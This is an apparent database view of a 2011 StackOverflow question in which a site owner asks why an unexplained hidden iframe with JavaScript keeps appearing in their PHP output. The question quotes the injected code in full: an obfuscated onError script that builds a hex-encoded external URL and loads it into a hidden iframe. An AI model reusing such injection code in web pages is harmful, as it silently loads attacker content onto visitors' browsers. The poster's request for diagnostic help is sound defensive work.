StackOverflow2013

Note that there are some explanatory texts on larger screens.

plurals

POHelp with odd PHP javascript/hidden iframe hack
primarykey
Id
5205343
data
AcceptedAnswerId
0
AnswerCount
3
ClosedDate
CommentCount
3
CommunityOwnedDate
CreationDate
2011-03-05T17:09:50.377
FavoriteCount
0
LastActivityDate
2012-12-21T07:51:31.420
LastEditDate
2011-03-06T03:31:56.370
LastEditorUserId
249144
OwnerUserId
249144
ParentId
0
PostTypeId
1
Score
2
ViewCount
1244
LastEditorDisplayName
text
Body
<p>Some pages on my site are including an unintended hidden iframe with some javascript in their output. I have read about sites getting hacked and similar code being added to php and html files before, but that is not quite the problem here, as none of my files actually contain the content that ends up in the output. I have no idea how this is happening. <strong>Is there some global php code that executes with each page load, or could it be at apache level?</strong> I'm at a loss.</p> <p>Here is an example of what I'm seeing in the output:</p> <pre><code><div style="display: block;overflow:hidden;width:0;height:0;left:0px;position:absolute;top:0px"><img id="7867" height="1" width="1"><img src="about:blank" onError='bvnnho=unescape("%27");fyvdmn=eval("document.getElementById("+bvnnho+"npelmp"+bvnnho+").src=unescape("+bvnnho+"%68%74%74%70%3A%2F%2F"+bvnnho+")+document.getElementById("+bvnnho+"7867"+bvnnho+").id+unescape("+bvnnho+"%2E%69%6E%2F"+bvnnho+")+"+bvnnho+"1299250012"+bvnnho+"+unescape("+bvnnho+"%2E%70%68%70"+bvnnho+")");document.getElementById("npelmp").src=fyvdmn' style="width:300;height:300;border:0px;"><iframe id="npelmp" src="about:blank"></iframe></div> </code></pre> <p>I have gone over my script very carefully and do not see how it could be outputting this. The reason I noticed it is that my script is used for writing a csv file, and an iframe--even hidden--sticks out like a sore-thumb in a csv file. My web host says they haven't gotten any complaints from other users, so it must be my problem.</p> <p>I have checked all my code (by hand and compared to my local copy), and I went through my database (which only contains integers anyway). I have found no sign of where this is coming from.</p> <p>Oh, the other bit that makes this so hard to track down is that it is not present every time. So when I try to show the host support, it wasn't there.</p> <p>Has anyone seen this before. Or any idea of where else I can look?</p> <p>Thanks...</p>
Tags
<php><javascript><apache><iframe>
Title
Help with odd PHP javascript/hidden iframe hack
singulars
PostAcceptedAnswerId
1. This table or related slice is empty.
PostParentId
1. This table or related slice is empty.
PostTypePostTypeId
1. PTQuestion
UserLastEditorUserId
1. USglancep
UserOwnerUserId
1. USglancep
plurals
PostLinksPostIdRelatedPostId
1. This table or related slice is empty.
PostLinksRelatedPostIdPostId
1. This table or related slice is empty.
PostsAcceptedAnswerId
1. This table or related slice is empty.
PostsParentIdCreationDate
1. PO
  singulars
  PostTypePostTypeId
  PTAnswer
2. PO
  singulars
  PostTypePostTypeId
  PTAnswer
3. PO
  singulars
  PostTypePostTypeId
  PTAnswer
VotesPostIdCreationDate
1. VO
  singulars
  PostPostId
  POHelp with odd PHP javascript/hidden iframe hack
  UserUserId
  This table or related slice is empty.
  VoteTypeVoteTypeId
  VTUpMod
2. VO
  singulars
  PostPostId
  POHelp with odd PHP javascript/hidden iframe hack
  UserUserId
  This table or related slice is empty.
  VoteTypeVoteTypeId
  VTUpMod
CommentsPostId

Querying!

Guidance

A row detail

Detail views are divided into sections. All the information in the data section comes from columns in the selected row. The other sections display data from other, related rows.

Related data can be related in a to-one or a to-many fashion. Captions of data related in a to-many fashion link to a list view showing a filtered view of the table.

Try moving around until you find a non-empty to-many entry and click on the label to get to one. You can move back to the root by clicking on the database name in the header.